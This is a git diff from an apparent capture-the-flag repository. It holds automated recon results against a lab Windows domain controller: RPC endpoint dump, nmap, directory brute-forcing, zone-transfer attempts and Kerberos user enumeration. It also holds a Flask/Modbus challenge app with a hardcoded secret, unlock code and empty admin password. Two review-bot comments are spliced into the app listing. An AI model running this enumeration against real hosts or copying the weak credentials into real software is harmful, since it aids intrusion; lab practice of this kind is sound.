ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: sysmain.dll +UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 +Bindings: + ncalrpc:[LRPC-6ba6be7619ad5499b5] + +Protocol: N/A +Provider: N/A +UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server +Bindings: + ncalrpc:[LRPC-e9c9cb51676dd7958e] + +Protocol: N/A +Provider: IKEEXT.DLL +UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API +Bindings: + ncalrpc:[LRPC-a6cbf0f8554ac2dd0e] + +Protocol: N/A +Provider: N/A +UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs +Bindings: + ncalrpc:[LRPC-78511121f1275f430c] + ncalrpc:[VpnikeRpc] + ncalrpc:[RasmanLrpc] + ncacn_np:\\DC[\PIPE\ROUTER] + +Protocol: [MS-SCMR]: Service Control Manager Remote Protocol +Provider: services.exe +UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49678] + +Protocol: [MS-CMPO]: MSDTC Connection Manager: 
+Provider: msdtcprx.dll +UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 +Bindings: + ncalrpc:[LRPC-3bcaafee1590c0de20] + ncalrpc:[OLE17B51056E4D45A611212712C1451] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + +Protocol: N/A +Provider: N/A +UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 +Bindings: + ncalrpc:[LRPC-802031e034c1f025bd] + +Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management +Provider: dns.exe +UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49695] + +Protocol: [MS-FRS2]: Distributed File System Replication Protocol +Provider: dfsrmig.exe +UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service +Bindings: + ncacn_ip_tcp:10.129.243.131[49843] + ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0] + +Protocol: N/A +Provider: N/A +UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0 +Bindings: + ncalrpc:[LRPC-92939372b55364a6c8] + ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060] + +[*] Received 405 endpoints. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt new file mode 100644 index 00000000..b917c34d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt @@ -0,0 +1,2 @@ +WinRM was possibly detected running on tcp port 5985. +Check _manual_commands.txt for manual commands you can run against this service. \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html new file mode 100644 index 00000000..61c8cab1 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html 
@@ -0,0 +1,50 @@ +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +Accept-Ranges: bytes +ETag: "0eaf6d7c895d71:0" +Server: Microsoft-IIS/10.0 +Date: Sat, 28 Oct 2023 13:05:55 GMT +Content-Length: 1034 + + + + + + Slandovia Energy + + + + + + + +
+ + + + +
+ +

MegaCorp

+

+ Slandovia Energy Grid +

+ +
+ + + + + + +
    + no results +
+
+ + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt new file mode 100644 index 00000000..9e57635c --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt @@ -0,0 +1,21 @@ +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php +200 GET 8l 168w 1092c http://10.129.243.131/License.txt +200 GET 1l 14w 116c http://10.129.243.131/SEARCH.php +200 GET 41l 66w 1034c http://10.129.243.131/INDEX.html diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt new file mode 100644 index 00000000..e69de29b 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt new file mode 100644 index 00000000..0d915fe8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt 
@@ -0,0 +1,106 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.033s latency). +Scanned at 2023-10-28 14:27:58 CEST for 128s + +Bug in http-security-headers: no string output. +PORT STATE SERVICE REASON VERSION +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +| http-headers: +| Content-Length: 1034 +| Content-Type: text/html +| Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +| Accept-Ranges: bytes +| ETag: "0eaf6d7c895d71:0" +| Server: Microsoft-IIS/10.0 +| Date: Sat, 28 Oct 2023 13:05:55 GMT +| Connection: close +| +|_ (Request type: HEAD) +|_http-config-backup: ERROR: Script execution failed (use -d to debug) +|_http-server-header: Microsoft-IIS/10.0 +|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) +|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. +| http-php-version: Logo query returned unknown hash a38e7a4db6688b811d52e1eab13a9b5c +|_Credits query returned unknown hash a38e7a4db6688b811d52e1eab13a9b5c +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +|_http-litespeed-sourcecode-download: Request with null byte did not work. 
This web server might not be vulnerable +| http-comments-displayer: +| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=megacorp.htb +| +| Path: http://megacorp.htb:80/style.css +| Line number: 117 +| Comment: +| /* +| The following are styles purely for the surroundings +| */ +| +| Path: http://megacorp.htb:80/ +| Line number: 11 +| Comment: +| +| +| Path: http://megacorp.htb:80/ +| Line number: 37 +| Comment: +| +| +| Path: http://megacorp.htb:80/style.css +| Line number: 1 +| Comment: +|_ /* this declares a better box model */ +|_http-fetch: Please enter the complete path of the directory to save data in. +|_http-errors: Couldn't find any error pages. +|_http-mobileversion-checker: No mobile version detected. +| http-vhosts: +|_128 names had status 200 +|_http-dombased-xss: Couldn't find any DOM based XSS. +|_http-jsonp-detection: Couldn't find any JSONP endpoints. +| http-sitemap-generator: +| Directory structure: +| / +| Other: 1; css: 1; js: 1 +| Longest directory structure: +| Depth: 0 +| Dir: / +| Total files found (by extension): +|_ Other: 1; css: 1; js: 1 +| http-useragent-tester: +| Status for browser useragent: 200 +| Allowed User Agents: +| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) +| libwww +| lwp-trivial +| libcurl-agent/1.0 +| PHP/ +| Python-urllib/2.5 +| GT::WWW +| Snoopy +| MFC_Tear_Sample +| HTTP::Lite +| PHPCrawl +| URI::Fetch +| Zend_Http_Client +| http client +| PECL::HTTP +| Wget/1.13.4 (linux-gnu) +|_ WWW-Mechanize/1.34 +|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) +|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. +| http-referer-checker: +| Spidering limited to: maxpagecount=30 +|_ https://cdnjs.cloudflare.com:443/ajax/libs/prefixfree/1.0.7/prefixfree.min.js +|_http-feed: Couldn't find any feeds. 
+|_http-csrf: Couldn't find any CSRF vulnerabilities. +|_http-chrono: Request times for /; avg: 159.55ms; min: 156.41ms; max: 162.52ms +|_http-date: Sat, 28 Oct 2023 13:05:55 GMT; +37m49s from local time. +|_http-title: Slandovia Energy +|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php +|_http-malware-host: Host appears to be clean +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:30:06 2023 -- 1 IP address (1 host up) scanned in 133.76 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png new file mode 100644 index 00000000..6a3a2fd8 Binary files /dev/null and b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png differ diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt new file mode 100644 index 00000000..7d343de9 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_whatweb.txt 
@@ -0,0 +1,46 @@ +WhatWeb report for http://10.129.243.131:80 +Status : 200 OK +Title : Slandovia Energy +IP : 10.129.243.131 +Country : RESERVED, ZZ + +Summary : HTML5, HTTPServer[Microsoft-IIS/10.0], Microsoft-IIS[10.0], Script + +Detected Plugins: +[ HTML5 ] + HTML version 5, detected by the doctype declaration + + +[ HTTPServer ] + HTTP server header string. This plugin also attempts to + identify the operating system from the server header. + + String : Microsoft-IIS/10.0 (from server string) + +[ Microsoft-IIS ] + Microsoft Internet Information Services (IIS) for Windows + Server is a flexible, secure and easy-to-manage Web server + for hosting anything on the Web. From media streaming to + web application hosting, IIS's scalable and open + architecture is ready to handle the most demanding tasks. + + Version : 10.0 + Website : http://www.iis.net/ + +[ Script ] + This plugin detects instances of script HTML elements and + returns the script language/type. + + +HTTP Headers: + HTTP/1.1 200 OK + Content-Type: text/html + Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT + Accept-Ranges: bytes + ETag: "0eaf6d7c895d71:0" + Server: Microsoft-IIS/10.0 + Date: Sat, 28 Oct 2023 13:05:55 GMT + Connection: close + Content-Length: 1034 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml new file mode 100644 index 00000000..2c936110 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml @@ -0,0 +1,81 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt new file mode 100644 index 00000000..787dc686 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt 
@@ -0,0 +1,27 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:53:13 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.065s latency). +Scanned at 2023-10-28 14:53:15 CEST for 36s + +PORT STATE SERVICE REASON VERSION +53/udp open domain udp-response ttl 127 (generic dns response: SERVFAIL) +| fingerprint-strings: +| NBTStat: +|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +|_dns-cache-snoop: 0 of 100 tested domains are cached. +| dns-nsec-enum: +|_ No NSEC records found +| dns-nsec3-enum: +|_ DNSSEC NSEC3 not supported +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653D044F%P=x86_64-pc-linux-gnu%r(NBT +SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA +SF:AAAAAAAA\0\0!\0\x01"); + +Host script results: +| dns-brute: +|_ DNS Brute-force hostnames: No results. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:51 2023 -- 1 IP address (1 host up) scanned in 37.94 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt new file mode 100644 index 00000000..f4665c79 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt 
@@ -0,0 +1,19 @@ +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 35295 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4000 +;; QUESTION SECTION: +;131.243.129.10.in-addr.arpa. IN PTR + +;; Query time: 4543 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:53:23 CEST 2023 +;; MSG SIZE rcvd: 56 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt new file mode 100644 index 00000000..a1f9cc44 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt @@ -0,0 +1,6 @@ + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 megacorp.htb +; (1 server found) +;; global options: +cmd +; Transfer failed. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt new file mode 100644 index 00000000..76501b7e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt @@ -0,0 +1,11 @@ +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; Query time: 4127 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:53:23 CEST 2023 +;; MSG SIZE rcvd: 28 + + 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt new file mode 100644 index 00000000..9fef9243 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt @@ -0,0 +1,3 @@ +[*] std: Performing General Enumeration against: megacorp.htb... +[-] Could not resolve domain: megacorp.htb + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml new file mode 100644 index 00000000..d0a60aca --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml @@ -0,0 +1,45 @@ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt new file mode 100644 index 00000000..99e51cb0 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt @@ -0,0 +1,12 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:53:13 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script=banner,krb5-enum-users --script-args krb5-enum-users.realm=megacorp.htb,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set. +Scanned at 2023-10-28 14:53:15 CEST for 6s + +PORT STATE SERVICE REASON VERSION +88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:53:21Z) +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:21 2023 -- 1 IP address (1 host up) scanned in 7.62 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml new file mode 100644 index 00000000..9bbdef4f --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml @@ -0,0 +1,35 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml new file mode 100644 index 00000000..c796df89 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml @@ -0,0 +1,103 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + +cpe:/a:jh_software:simple_dns_pluscpe:/o:microsoft:windows +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + + + + + + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml new file mode 100644 index 00000000..2ccbe517 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows + + + + + + + + + + +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows + + + + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/search.req b/LaokoonHaxorcist/fullpwn/search.req new file mode 100644 index 00000000..616e57a9 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/search.req @@ -0,0 +1,13 @@ +POST /search.php HTTP/1.1 +Host: 10.129.243.131 +Content-Length: 9 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Accept: */* +Origin: http://10.129.243.131 +Referer: http://10.129.243.131/ +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +query=abc \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/users.txt b/LaokoonHaxorcist/fullpwn/users.txt new file mode 100644 index 00000000..db28c087 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/users.txt @@ -0,0 +1,3 @@ +Administrator +Admin +Guest diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile b/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile new file mode 100644 index 00000000..a13dc719 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile 
@@ -0,0 +1,21 @@
+FROM ubuntu:latest
+
+RUN apt-get update --fix-missing && apt-get -y upgrade
+RUN apt-get install -y python3 python3-pip supervisor
+RUN pip3 install flask flask_httpauth umodbus
+
+# Setup app
+RUN mkdir -p /app
+
+# Copy challenge
+COPY challenge/ /app
+
+# Setup supervisor
+COPY config/supervisord.conf /etc/supervisord.conf
+
+# Expose the port the challenge is reachable on
+EXPOSE 80 502
+
+# Run supervisord
+CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]
+
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh b/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh
new file mode 100755
index 00000000..00526627
--- /dev/null
+++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+docker rm -f invasion
+docker build --tag=invasion . && \
+docker run -p 80:80 -p 502:502 --rm --name=invasion invasion
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py
new file mode 100644
index 00000000..7a9bdc37
--- /dev/null
+++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py
@@ -0,0 +1,104 @@
+from flask import *
+from os import path
+import random
+from flask_httpauth import HTTPBasicAuth
+from werkzeug.security import generate_password_hash, check_password_hash
+
+app = Flask(__name__)
+app.secret_key = '45de23-dc231-54569-342da'
+SCRIPT_TEMPLATE = """
+
+"""
+
+HTML_TEMPLATE = """
+
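Review bot: The image is not reproducible, because `FROM ubuntu:latest` and the unpinned `RUN pip3 install flask flask_httpauth umodbus` both resolve to whatever is current at build time, so two builds of the same commit can ship different code. Pin the base image to a release tag or digest and give each Python package an exact version, e.g. `RUN pip3 install flask==<tested-version> flask_httpauth==<tested-version> umodbus==<tested-version>`. `apt-get update` runs in a different layer from `apt-get install`, so a cached index can be paired with a later install; merging the two into one `RUN` avoids that. No `USER` line is set, so supervisord and both services it starts run as root inside the container.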
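Review bot: `docker run -p 80:80 -p 502:502` publishes both ports on every host interface, so the web panel and the Modbus listener become reachable from whatever network the build machine is attached to. For local testing, bind them to loopback instead: `docker run -p 127.0.0.1:80:80 -p 127.0.0.1:502:502 --rm --name=invasion invasion`. A one-line comment stating that the script is meant for local testing only would make that intent explicit.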


+PassCode: + +
+"""
+def sess_init():
+ session['granted']=False
+
+auth = HTTPBasicAuth()
+users = {
+ "admin": generate_password_hash("")
+}
+
+@auth.verify_password
+def verify_password(username, password):
+ if username in users and \
+ check_password_hash(users.get(username), password):
+ return username
+
+@app.route("/")
+@auth.login_required
+def index():
+ if not session:
+ sess_init()
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('0000000000'))
+
+@app.route("/access",methods=["GET","POST"])
+@auth.login_required
+def access():
+ if request.method == 'POST':
+ serial = request.values.get('unlock_code')
+ if serial=='44219054768211203764':
+ session['granted']=True
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ENABLED'))
+ else:
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('FAILED'),fm=HTML_TEMPLATE)
+ else:
+ if path.exists('/app/.conf') and not path.exists('/app/.provision'):
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ENROLL_ERR'))
+ if path.exists('/app/.conf') and path.exists('/app/.provision'):
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('AUTH_ERR'),fm=HTML_TEMPLATE)
+ else:
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF'))
+
+@app.route("/provision")
+@auth.login_required
+def provision():
+ if path.exists('/app/.conf'):
+ open('/app/.provision','w').write('')
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('SUCCESS'))
+ else:
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF'))
+
+@app.route("/state")
+@auth.login_required
+def status():
+ if path.exists('/app/.conf'):
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_ON'))
+ else:
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF'))
+
+@app.route("/power")
+@auth.login_required
+def power():
+ return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ERROR'))
+
+@app.route("/rate")
+@auth.login_required
+def rate():
+ if 
session['granted']:
+ r = random.randint(1, 10)
+ return make_response("Gamma Dose Rate : 0.02{}34456{} uR/hr
{}
".format(r,r,'HTB{this_is_a_fake_flag}'))
+ else:
+ r = random.randint(100,10000)
+ return make_response("Gamma Dose Rate : {} uR/hr".format(r))
+
+app.run('0.0.0.0',80)
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py
new file mode 100755
index 00000000..8a334914
--- /dev/null
+++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/bot.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+
+import socket
+from os import path
+from time import sleep
+from umodbus import conf
+from umodbus.client import tcp
+
+conf.SIGNED_VALUES = True
+
+#Populate coils data to default
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect(('127.0.0.1', 502))
+msg = tcp.write_multiple_coils(slave_id=1, starting_address=1, values=[1, 0, 0, 1, 1, 0, 0, 1 ,1])
+tcp.send_message(msg, sock)
+sock.close()
+
+while True:
+ sleep(2)
